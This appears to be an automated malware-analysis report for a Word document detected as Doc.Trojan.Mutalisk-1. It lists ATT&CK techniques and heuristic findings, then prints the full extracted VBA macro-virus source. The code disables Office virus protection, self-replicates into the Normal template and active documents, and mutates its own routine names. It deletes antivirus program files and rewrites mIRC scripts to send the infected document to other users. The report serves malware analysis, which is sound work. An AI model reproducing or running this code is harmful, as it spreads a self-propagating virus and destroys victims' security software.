MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1027 Obfuscated Files or Information
T1566.001 Spearphishing Attachment
This document exhibits critical heuristic firings for VBA macro virus replication and AV tampering, along with legacy WordBasic macro-virus markers. The VBA script attempts to disable virus protection and replicate itself into the Normal template and active document, indicating a self-propagating malicious macro. It also attempts to delete common antivirus executables and data files, suggesting an effort to evade detection and facilitate further malicious activity.
Heuristics 5
-
ClamAV: Doc.Trojan.Mutalisk-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mutalisk-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7489 bytes |
SHA-256: f83d0f088aa83e404147556b099fa449165a170556fc94b4e9c51dd8502ee696 |
|||
|
Detection
ClamAV:
Doc.Trojan.Mutalisk-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'xxlss666
Sub qw1255914()
On Error Resume Next
Dim NI As Boolean
Dim AI As Boolean
Dim N As Integer
Dim A As Integer
Dim Code As String
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.DisplayAlerts = wdAlertsNone
Application.StatusBar = False
For t = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(t).CodeModule.Lines(1, 1) = "'xxlss666" Then
NI = True
N = t
End If
Next t
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(y).CodeModule.Lines(1, 1) = "'xxlss666" Then
AI = True
A = y
End If
Next y
If NI = True And AI = False Then
r = NormalTemplate.VBProject.VBComponents.Item(N).CodeModule.CountOfLines
Code = NormalTemplate.VBProject.VBComponents.Item(N).CodeModule.Lines(1, r)
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString Code
qw71274 N, True
ElseIf NI = False And AI = True Then
m = ActiveDocument.VBProject.VBComponents.Item(A).CodeModule.CountOfLines
Code = ActiveDocument.VBProject.VBComponents.Item(A).CodeModule.Lines(1, m)
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString Code
qw71274 A, False
End If
End Sub
Sub qw826545()
On Error Resume Next
Kill "C:\Program Files\AntiViral Toolkit Pro\Avp32.exe"
Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
Kill "C:\Program Files\Command Software\F-PROT95\*.dll"
Kill "C:\Program Files\Command Software\F-PROT95\*.exe"
Kill "C:\Program Files\McAfee\VirusScan95\Scan.dat"
Kill "C:\Program Files\McAfee\VirusScan\Scan.dat"
Kill "C:\Program Files\Norton AntiVirus\Viruscan.dat"
Kill "C:\Program Files\Symantec\Symevnt.386"
Kill "C:\Program Files\FindVirus\Findviru.drv"
Kill "C:\Program Files\Cheyenne\AntiVirus\*.dll"
Kill "C:\Program Files\Cheyenne\Common\Cshell.dll"
Kill "C:\PC-Cillin 95\Lpt$vpn.*"
Kill "C:\PC-Cillin 95\Scan32.dll"
Kill "C:\eSafe\Protect\*.dll"
Kill "c:\f-macro\f-macro.exe"
Kill "C:\TBAVW95\Tbscan.sig"
Kill "C:\Tbavw95\Tb*.*"
Kill "C:\VS95\*.dll"
End Sub
Sub qw426232()
On Error Resume Next
k = Dir("c:\mirc\mirc32.exe")
If k = "" Then
Exit Sub
Else
m = Dir("c:\mirc\backup\Y2K.doc")
If m = "" Then ActiveDocument.SaveAs "c:\mirc\backup\Y2K.doc"
Kill "c:\mirc\script.ini"
Open "c:\mirc\script.ini" For Random As g
Print g; "[script]"
Print g; "n0=on 1:text:*virus*:#:/msg $chan Virus Alert!!! "
Print g; "n1=on 1:text:*virus*:#:/join #vir"
Print g; "n2=on 1:text:*vrus*:#:/echo Well thanx for coming in #vir the best channel about viruses"
Print g; "n3=on 1:nick:/msg $chan $nick changed his name to $newnick"
Print g; "n4=on 1:join:#:/send $nick c:\mirc\backup\Y2K.doc"
Close g
Beep
End If
End Sub
Sub autoopen()
On Error Resume Next
Application.ShowVisualBasicEditor = True
qw1255914
qw826545
qw426232
End Sub
Sub autonew()
On Error Resume Next
Application.ShowVisualBasicEditor = False
qw1255914
qw826545
qw426232
End Sub
Function qw71274(x As Integer, doc As Boolean)
On Error Resume Next
Dim r As Integer, g As String
If doc = False Then
Set grr = NormalTemplate.VBProject.VBComponents
Else
Set grr = ActiveDocument.VBProject.VBComponents
End If
r = Int(15 * Rnd)
f = Int((2354376 * Rnd) + 34)
h = Int((735436 * Rnd) + 34)
p = Int((2854345 * Rnd) + 34)
c = Int((235935 * Rnd) + 34)
If r = 1 Then g = "kk"
If r = 2 Then g = "tr"
If r = 3 Then g = "jp"
If r = 4 Then g = "hh"
If r = 5 Then g = "oo"
If r = 7 Then g = "kl"
If r = 8 Then g = "nb"
If r = 9 Then g = "kr"
If r = 10 Then g = "qw"
If r = 11 Then g = "zx"
If r = 12 Then g = "mp"
If r = 13 Then g = "au"
If r = 14 Then g = "mw"
If r = 15 Then g = "lk"
instal = g & f
payl = g & h
retro = g & p
mut = g & c
ia = g & h
grr.Item(x).CodeModule.replaceline 2, "sub " & instal & "()"
grr.Item(x).CodeModule.replaceline 29, mut & " N, True"
grr.Item(x).CodeModule.replaceline 34, mut & " A, False"
grr.Item(x).CodeModule.replaceline 37, "Sub " & retro & "()"
grr.Item(x).CodeModule.replaceline 58, "Sub " & payl & "()"
grr.Item(x).CodeModule.replaceline 81, instal
grr.Item(x).CodeModule.replaceline 82, retro
grr.Item(x).CodeModule.replaceline 83, payl
grr.Item(x).CodeModule.replaceline 88, instal
grr.Item(x).CodeModule.replaceline 89, retro
grr.Item(x).CodeModule.replaceline 90, payl
grr.Item(x).CodeModule.replaceline 92, "Function " & mut & "(x As Integer, doc As Boolean)"
grr.Item(x).CodeModule.replaceline 144, "'" & ia & (2454356 * Rnd) & retro
grr.Item(x).CodeModule.replaceline 145, "'" & payl & retro & (42354523654647# * Rnd) & retro & (253465356 * Rnd)
grr.Item(x).CodeModule.replaceline 146, "'" & instal & retro & payl & instal & (34523656363456# * Rnd)
grr.Item(x).CodeModule.replaceline 147, "'" & retro & (523452345636# * Rnd)
grr.Item(x).CodeModule.replaceline 148, "'" & (243277777777# * Rnd) & "rr" & retro
grr.Item(x).CodeModule.replaceline 149, "'" & ia & retro & (23452352353# * Rnd) & instal
grr.Item(x).CodeModule.replaceline 152, "'" & payl & (2342453636# * Rnd) & instal
grr.Item(x).CodeModule.replaceline 153, "'" & instal & (35443453424869# * Rnd) & retro & payl
'qw4262321901488,01264715qw826545
'qw426232qw826545593710530372,198qw826545192817075,772604
'qw1255914qw826545qw426232qw125591428119173571442,4
'qw826545371147551884,648
'11033317933,4447rrqw826545
'qw426232qw8265459710040711,59849qw1255914
grr.Item(x).CodeModule.replaceline 156, "'" & instal & retro & (432534647567654# * Rnd)
grr.Item(x).CodeModule.replaceline 157, "'" & instal & retro & payl & instal & (34523656363456# * Rnd)
'qw4262322020645810,45021qw1255914
'qw125591428017341689294,4qw826545qw426232
grr.Item(x).CodeModule.replaceline 159, "'" & instal & retro & payl & instal & (34523656363456# * Rnd)
grr.Item(x).CodeModule.replaceline 160, "'" & instal & retro & payl & instal & (34523656363456# * Rnd)
'qw1255914qw826545161567335440981
'qw1255914qw826545qw426232qw125591433210140442225,6
'zx126003zx1337865zx435749zx12600323997928884460,3
'qw1255914qw826545qw426232qw125591430085496534362,1
'qw1255914qw826545qw426232qw12559141941502137876,03
grr.Item(x).CodeModule.replaceline 164, "'" & instal & retro & payl & instal & (34523656363456# * Rnd)
grr.Item(x).CodeModule.replaceline 167, "'" & instal & retro & payl & instal & (34523656363456# * Rnd)
'qw1255914qw826545qw426232qw125591432782167438431.9
'qw1255914qw826545qw426232qw125591432782167438431,9
End Function
Sub viewvbcode()
'qw1255914qw826545qw426232qw125591412567255772115,3
Application.ShowVisualBasicEditor = False
Application.ScreenUpdating = False
Application.StatusBar = "|-y0z4C-|"
Options.VirusProtection = False
ActiveDocument.SaveAs "c:\ReadMe.doc"
o = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, o
ActiveDocument.Saved = True
r = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, r
NormalTemplate.Saved = True
Application.ShowVisualBasicEditor = True
End Sub
Sub toolsmacro()
End Sub
Sub filetemplates()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.